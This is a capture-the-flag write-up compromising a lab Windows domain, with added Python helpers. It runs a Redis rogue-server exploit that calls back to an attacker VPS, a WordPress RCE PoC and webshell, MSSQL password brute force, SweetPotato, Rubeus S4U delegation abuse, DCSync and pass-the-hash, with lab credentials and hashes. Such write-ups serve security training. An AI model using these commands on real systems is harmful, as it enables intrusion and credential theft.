Cloud craving struck, so 春秋云境 got opened in a second.
Entry point
Port scan
Port 6379 runs Redis with no authentication, and the FTP server allows anonymous login.
The FTP only has an empty pub folder, nothing else; on to Redis --> Redis commands
Nothing in Redis either.
Found a well-known project for this: redis-rogue-server.
The exp takes the box directly:
python3 redis-rogue-server.py --rhost=47.92.86.223 --lhost=VPS-IP
Note: unless you patch the script, this exploit also has to run on the VPS, otherwise it hangs at "Setting dbfilename". The reason is in the code: after SLAVEOF and CONFIG SET the script waits for the target to connect back to --lhost as a replica, and a target on the range cannot reach a listener on a machine that is not publicly reachable.
Shell received.
Drop an implant straight away and bring the box online in viper for the later steps.
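An added example (not from this post or from the redis-rogue-server project) showing what the unauthenticated-access check and the rogue-server command sequence look like on the wire: a minimal RESP encoder/parser, a PING probe that tells an open instance from one answering NOAUTH or a protected-mode error, and the SLAVEOF / CONFIG SET / MODULE LOAD commands a rogue-server exploit sends. The function names, the reply labels and the module name exp.so are this example's own choices.

```python
import socket


def resp_encode(*args):
    """Encode one command as a RESP array of bulk strings: the exact bytes
    redis-cli, or a rogue-server exploit, writes to port 6379."""
    out = b"*%d\r\n" % len(args)
    for arg in args:
        data = arg if isinstance(arg, bytes) else str(arg).encode()
        out += b"$%d\r\n%s\r\n" % (len(data), data)
    return out


def resp_parse(buf):
    """Parse one RESP reply. Returns (kind, value, unconsumed_bytes)."""
    if not buf:
        raise ValueError("empty reply")
    prefix, rest = buf[:1], buf[1:]
    line, _, rest = rest.partition(b"\r\n")
    if prefix == b"+":
        return "status", line.decode(), rest
    if prefix == b"-":
        return "error", line.decode(), rest
    if prefix == b":":
        return "integer", int(line), rest
    if prefix == b"$":
        n = int(line)
        if n < 0:                                   # null bulk string
            return "bulk", None, rest
        return "bulk", rest[:n], rest[n + 2:]       # skip the trailing CRLF
    if prefix == b"*":
        items = []
        for _ in range(int(line)):
            _, item, rest = resp_parse(rest)
            items.append(item)
        return "array", items, rest
    raise ValueError("unknown RESP prefix %r" % prefix)


def classify_ping_reply(reply):
    """Label what an unauthenticated PING got back (labels are this example's own)."""
    kind, value, _ = resp_parse(reply)
    if kind == "status" and value == "PONG":
        return "unauthenticated"      # no requirepass: the 6379 finding above
    if kind == "error" and value.startswith("NOAUTH"):
        return "auth_required"
    if kind == "error" and "protected mode" in value:
        return "protected_mode"       # non-loopback bind without a password
    return "unknown"


def probe_redis(host, port=6379, timeout=3.0):
    """Live check: send PING without AUTH and classify the answer."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(resp_encode("PING"))
        return classify_ping_reply(sock.recv(4096))


def rogue_server_commands(lhost, lport, module="exp.so"):
    """Command sequence of a redis-rogue-server style attack, in order.
    After the first two the target opens a TCP connection to lhost:lport as a
    replica and expects a FULLRESYNC plus an RDB payload (the .so). If it
    cannot reach lhost, nothing arrives and the exploit sits waiting; that is
    the 'Setting dbfilename' hang mentioned above."""
    return [
        resp_encode("SLAVEOF", lhost, lport),
        resp_encode("CONFIG", "SET", "dbfilename", module),
        resp_encode("MODULE", "LOAD", "./" + module),
    ]
```

probe_redis(host) does the live check; the encoder and parser are exercised on constructed replies. The replica handshake in the last function is why --lhost must be an address the target can open a connection to.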
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.2.7 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe0a:aef6 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:0a:ae:f6 txqueuelen 1000 (Ethernet)
RX packets 111385 bytes 149022513 (142.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 21876 bytes 5471977 (5.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Then upload fscan and scan the internal network:
(icmp) Target 172.22.2.3 is alive
(icmp) Target 172.22.2.7 is alive
(icmp) Target 172.22.2.16 is alive
(icmp) Target 172.22.2.18 is alive
(icmp) Target 172.22.2.34 is alive
[*] Icmp alive hosts len is: 5
172.22.2.16:445 open
172.22.2.3:445 open
172.22.2.34:139 open
172.22.2.16:139 open
172.22.2.18:139 open
172.22.2.34:135 open
172.22.2.3:139 open
172.22.2.16:135 open
172.22.2.3:135 open
172.22.2.16:80 open
172.22.2.18:80 open
172.22.2.7:80 open
172.22.2.18:22 open
172.22.2.7:21 open
172.22.2.16:1433 open
172.22.2.34:445 open
172.22.2.18:445 open
172.22.2.7:22 open
172.22.2.7:6379 open
172.22.2.3:88 open
[*] alive ports len is: 20
start vulscan
[*] WebTitle: http://172.22.2.7 code:200 len:4833 title:Welcome to CentOS
[*] NetInfo:
[*]172.22.2.34
[->]CLIENT01
[->]172.22.2.34
[*] NetInfo:
[*]172.22.2.3
[->]DC
[->]172.22.2.3
[*] NetBios: 172.22.2.34 XIAORANG\CLIENT01
[*] NetInfo:
[*]172.22.2.16
[->]MSSQLSERVER
[->]172.22.2.16
[*] 172.22.2.3 (Windows Server 2016 Datacenter 14393)
[*] 172.22.2.16 (Windows Server 2016 Datacenter 14393)
[*] WebTitle: http://172.22.2.16 code:404 len:315 title:Not Found
[*] NetBios: 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.2.3 [+]DC DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.2.18 WORKGROUP\UBUNTU-WEB02
[+] ftp://172.22.2.7:21:anonymous
[->]pub
[*] WebTitle: http://172.22.2.18 code:200 len:57738 title:又一个WordPress站点
Five machines in total. In brief:
172.22.2.3 domain controller
172.22.2.7 compromised (the Redis box)
172.22.2.16 mssql
172.22.2.18 wordpress
172.22.2.34 (CLIENT01, nothing of interest yet)
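An added helper, not part of this post or of fscan, that turns the scan output above into the per-host summary: it parses the alive, port, OS, NetBios, WebTitle and [+] finding lines (the multi-line NetInfo blocks are ignored) and attaches a role hint from the port (88 for a DC, 1433 for MSSQL, 6379 for Redis, 21 for FTP) or from the page title. The role table is this example's own heuristic; the sample lines are copied from the fscan output above.

```python
import re
from collections import defaultdict

# Lines copied from the fscan output above (a subset), so the parser runs offline.
SAMPLE = r"""
(icmp) Target 172.22.2.3 is alive
(icmp) Target 172.22.2.7 is alive
(icmp) Target 172.22.2.16 is alive
(icmp) Target 172.22.2.18 is alive
(icmp) Target 172.22.2.34 is alive
[*] Icmp alive hosts len is: 5
172.22.2.16:445 open
172.22.2.3:445 open
172.22.2.34:139 open
172.22.2.3:139 open
172.22.2.3:135 open
172.22.2.18:80 open
172.22.2.7:80 open
172.22.2.18:22 open
172.22.2.7:21 open
172.22.2.16:1433 open
172.22.2.34:445 open
172.22.2.7:6379 open
172.22.2.3:88 open
[*] WebTitle: http://172.22.2.7 code:200 len:4833 title:Welcome to CentOS
[*] 172.22.2.3 (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.2.3 [+]DC DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.2.18 WORKGROUP\UBUNTU-WEB02
[+] ftp://172.22.2.7:21:anonymous
[*] WebTitle: http://172.22.2.18 code:200 len:57738 title:又一个WordPress站点
"""

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
ALIVE = re.compile(r"^\(icmp\) Target " + IP + r" is alive$")
PORT = re.compile(r"^" + IP + r":(\d+) open$")
OS = re.compile(r"^\[\*\] " + IP + r" \((.+)\)$")
NETBIOS = re.compile(r"^\[\*\] NetBios: " + IP + r" (.+)$")
TITLE = re.compile(r"^\[\*\] WebTitle: https?://" + IP + r"(?::\d+)?/? code:(\d+) len:\d+ title:(.*)$")
FINDING = re.compile(r"^\[\+\] (.+)$")
IP_ANYWHERE = re.compile(r"(?<![\d.])" + IP + r"(?![\d.])")   # first whole IPv4 in a string

# Port -> likely role. Heuristic of this example, not something fscan reports.
ROLE_PORTS = {21: "ftp", 88: "domain controller (Kerberos)", 1433: "mssql", 6379: "redis"}


def _new_host():
    return {"ports": set(), "os": None, "netbios": [], "titles": [], "findings": []}


def parse_fscan(text):
    """Group fscan's per-line output by host; unknown lines are skipped."""
    hosts = defaultdict(_new_host)
    for raw in text.splitlines():
        line = raw.strip()
        m = ALIVE.match(line)
        if m:
            hosts[m.group(1)]   # touching the defaultdict key registers the host
            continue
        m = PORT.match(line)
        if m:
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
            continue
        m = OS.match(line)
        if m:
            hosts[m.group(1)]["os"] = m.group(2)
            continue
        m = NETBIOS.match(line)
        if m:
            hosts[m.group(1)]["netbios"].append(m.group(2))
            continue
        m = TITLE.match(line)
        if m:
            hosts[m.group(1)]["titles"].append((int(m.group(2)), m.group(3)))
            continue
        m = FINDING.match(line)
        if m:
            ip = IP_ANYWHERE.search(m.group(1))
            if ip:
                hosts[ip.group(1)]["findings"].append(m.group(1))
    return dict(hosts)


def role_hints(info):
    """Guess what a host is from its open ports and web titles."""
    hints = [ROLE_PORTS[p] for p in sorted(info["ports"]) if p in ROLE_PORTS]
    if any("wordpress" in title.lower() for _, title in info["titles"]):
        hints.append("wordpress")
    return hints


def summarize(hosts):
    """One line per host, numerically sorted, like the hand-written table above."""
    rows = []
    for ip in sorted(hosts, key=lambda a: tuple(int(o) for o in a.split("."))):
        info = hosts[ip]
        ports = ",".join(str(p) for p in sorted(info["ports"])) or "-"
        name = info["netbios"][0] if info["netbios"] else "-"
        hints = ",".join(role_hints(info)) or "-"
        rows.append(f"{ip:<15} ports={ports} name={name} os={info['os'] or '-'} hints={hints}")
    return rows


if __name__ == "__main__":
    for row in summarize(parse_fscan(SAMPLE)):
        print(row)
```

Feed it the full fscan output with parse_fscan(open("fscan.txt").read()); the [+] handler also picks up credential hits such as the later mssql one, since it keys any [+] line on the first IP it contains.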
Two exploitable services are visible, but first grab the flag on the current box.
Manual enumeration shows the base64 binary has the SUID bit set, so it can encode a file readable only by root and you simply decode the output; read the flag that way.
Set up a proxy through viper first.
Proxy connected; scan with wpscan:
p4 wpscan --url http://172.22.2.18/ --api-token <your-api-token>
One plugin obviously has a problem at a glance.
Go straight for a PoC of its first RCE (CVE-2021-25003):
https://github.com/biulove0x/CVE-2021-25003
p4 python3 WpCargo.py -t http://172.22.2.18/
RCE works.
Write a one-liner webshell into the current directory and connect with AntSword (蚁剑).
Take a look at wp-config.php, and while at it set up a port forward on the first box so this machine can be brought online in viper too.
DB credentials from wp-config.php:
/** Database username */
define( 'DB_USER', 'wpuser' );
/** Database password */
define( 'DB_PASSWORD', 'WpuserEha8Fgj9' );
Browse the database straight from AntSword.
Got flag2.
The S0meth1ng_y0u_m1ght_1ntereSted table in the same database also holds a password list,
999 passwords in total, not pasted here.
Looking back at the port scan, the guess is that this is a password list for the MSSQL box (172.22.2.16:1433).
Brute-force it with fscan:
fscan -h 172.22.2.16 -m mssql -pwdf 1.txt
Got the password:
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.2.16 is alive
[*] Icmp alive hosts len is: 1
172.22.2.16:1433 open
[*] alive ports len is: 1
start vulscan
[+] mssql:172.22.2.16:1433:sa ElGNkOiC
已完成 1/1
[*] 扫描结束,耗时: 655.654931ms
Connect with MDUT and bring this box online too.
Once online, SweetPotato without a second thought; the privesc works, a SYSTEM session comes online, and that is flag3.
Grab the domain hashes in viper's msf:
MSSQLSERVER$ XIAORANG a6c742dc3079e8090e03ffe3c50cf674
MSSQLSERVER$ XIAORANG cea3e66a2715c71423e7d3f0ff6cd352
Use Rubeus to request a TGT as the machine account MSSQLSERVER$, authenticating with its rc4 (NT) hash:
.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:a6c742dc3079e8090e03ffe3c50cf674 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap
TGT obtained:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: Ask TGT
[*] Using rc4_hmac hash: a6c742dc3079e8090e03ffe3c50cf674
[*] Building AS-REQ (w/ preauth) for: 'xiaorang.lab\MSSQLSERVER$'
[*] Using domain controller: 172.22.2.3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
[base64 ticket omitted]
ServiceName : krbtgt/xiaorang.lab
ServiceRealm : XIAORANG.LAB
UserName : MSSQLSERVER$
UserRealm : XIAORANG.LAB
StartTime : 2023/5/26 16:09:08
EndTime : 2023/5/27 2:09:08
RenewTill : 2023/6/2 16:09:08
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : qvZTbW4jrgtkTrHdZ6cvZA==
ASREP (key) : A6C742DC3079E8090E03FFE3C50CF674
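Worked example, added here and not taken from the post or from Rubeus, of where the value given to /rc4: comes from: an account's rc4_hmac Kerberos key is its NT hash, MD4 over the UTF-16LE encoding of the password, which is also what wmiexec's -hashes :NT takes later and why the ASREP (key) line above simply echoes the hash that was supplied. MD4 is implemented inline because hashlib often lacks it on OpenSSL 3; the test passwords below are constructed and say nothing about the accounts in this range.

```python
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def _F(x, y, z):
    return (x & y) | (~x & z)


def _G(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _H(x, y, z):
    return x ^ y ^ z


# (round function, message-word order, per-step shifts, additive constant), RFC 1320
_ROUNDS = (
    (_F, list(range(16)), (3, 7, 11, 19), 0x00000000),
    (_G, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
    (_H, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
)


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest of data (pure Python, no hashlib dependency)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)   # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        regs = list(state)
        for func, order, shifts, const in _ROUNDS:
            for i, k in enumerate(order):
                idx = (-i) % 4          # registers are updated in the order a, d, c, b
                x, y, z = regs[(idx + 1) % 4], regs[(idx + 2) % 4], regs[(idx + 3) % 4]
                regs[idx] = _rotl((regs[idx] + func(x, y, z) + X[k] + const) & _MASK, shifts[i % 4])
        state = [(s + r) & _MASK for s, r in zip(state, regs)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), as 32 lowercase hex chars.
    This value is also the account's rc4_hmac Kerberos key, so it is what
    Rubeus /rc4: and impacket's -hashes :NT expect."""
    return md4(password.encode("utf-16-le")).hex()


def looks_like_nt_hash(value: str) -> bool:
    """Sanity check before pasting a hash into a tool: 32 hex digits, nothing else."""
    return len(value) == 32 and all(c in "0123456789abcdefABCDEF" for c in value)


if __name__ == "__main__":
    print(nt_hash("password"))      # constructed sample password, not one from this range
```

The same function explains the two MSSQLSERVER$ lines above: any change of the machine-account password changes this MD4 value, so whichever of the two hashes the DC currently holds is the one asktgt must be given.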
Then run the S4U chain with that TGT: S4U2self for Administrator, followed by S4U2proxy to LDAP/DC.xiaorang.lab, and inject the resulting ticket into the current session with /ptt. This works only if MSSQLSERVER$ is trusted to delegate to that SPN; the ticket argument is the base64 TGT from the previous step:
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:LDAP/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3jL/Z8Oy6ClEMXCoRwLjpHbQYIdU/WtGjPj9dj67z2y87e7mgTLkMT5Bzw107e8YgY/CSvUUwy1X8W+9Hmp9ejxgAW7kKsAVMnY8kx2peDgV+vL+HfpmAfDWljZPDve5ZR2+dENFkzO82dbzn1cE+38ubWX8lGAJdOfvYHqbhQs1cErKaLQs2c4XHEKRUTryROkvjM4m5BZt/FAwFbVEF0ALCdNQDOI3rzRAsfjDZhHLSBy9SGqIkPZsGwIzxtL3dVqmO7JevAvrh3eRNskCyNEuq6F4uAL1jJPVJjMugtc+9/IPCzwtLIGy42o2m9LnR7s5g5hhgQYLMqZrVzw6SE5qNrtrAeBdc5GN8B0iZHgX95QEB9rrVtT6YBhtKs6SLLkTw31B1p8NZFFUe0wH26YHjNf1tOTEcTylh+WfRCfGze/aIY7lvAJ73ZXrGYKW/3qBO9mgE97RnUK1fjtsXjQ2WK0qsOOmm6A4bxn3t25VlBdTgw7AeLICh5cJ889sFGRss7MZSrS6lMiPFRTa2SXS/l2Phk/6OU+W15ZLZ4G9XQUZ814rY28WYg7Txc2T003aH4Usxc2XTb13W4lCNvrwF1AxW6/8/IgdUBB3nYPQsT4Fjoi4BHvZtp45nD51OnqxD0FGCLxvumjNhmeb40nZJAUEJkP4aC3OQ/mWF0hmfyzD17kKF6a3QEzLh4zjUAbceyU91/zCuljBtD3vVHN3WrXmwXF3VTYVELUmMSunTQxMCSyXUb6LFBocLhKuez/53H4DkMN+8CjA7UcTHCYoZI5H+Vu7s8znZQIc75dH+h0fE2tzadH4a+44Ew+LOuTlUjqKlEcOz9wkJgsYaEo6rnBHMbcWSH04Vxbx6RqUwgYJ3eFi8lavUWoLFp6Y/PcWvfOPWYVYT8QUuBNzqmwpTfVHN8e2MN6zcBaV0gknTqEME3oY49wJX/A8RCFlgPSmchvbc8dzNk5Pqk0vJcLQ0XjLGH1Orhmgytlri5s2jpIawDM4U/IDVhEQoh13LDg9VVmDX3OU5CoTWUxL0QzXm4EMcL5Qmdi05gcsQrEI82YzM7cmAQsAvNvktja1hS/0o4CkXANoGWmcsic9viMmQR0QhbM7y2b9zgvmmJMItbS8HlWxTjYTMQeTkHfO+VGbN7bUzvv6ErbSnP65UWlqxgXxIKv9vnRatUgbEA2+sZR+xVbeDowuit54Rr2CGaOpaHQye6IOrmAJiKJD5Ds2vbrNBHNFtWFucEkx91uhBEcB8J4tcKO+8Z/zhUwOtCSPUDec/Vpy5OTgNYCkZ98yXCTc21xm++eSOoZK5DwNc9FgzI70sXuw+jNuLILeoSnCbsw2VDFBRta3/Q+n1tJlI8qk55HU1vNLp0atmhIVao59tmatNRhveJeKxb8UzNe8BHSE2RkvDuCkp7Pl9TatBWWo0Q7UEmZQ2Ry9tMVi1qFTI6u5IgyNQeAcCjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBCq9lNtbiOuC2ROsd1npy9koQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIzMDUyNjA4MDkwOFqmERgPMjAyMzA1MjYxODA5MDhapxEYDzIwMjMwNjAyMDgwOTA4WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==
With the LDAP ticket in the session, DCSync with mimikatz:
lsadump::dcsync /domain:xiaorang.lab /user:Administrator
Got the Administrator NT hash; pass-the-hash with wmiexec to the DC for flag4:
p4 python3 wmiexec.py -hashes :1a19251fbd935969832616366ae3fe62 Administrator@172.22.2.3
Done.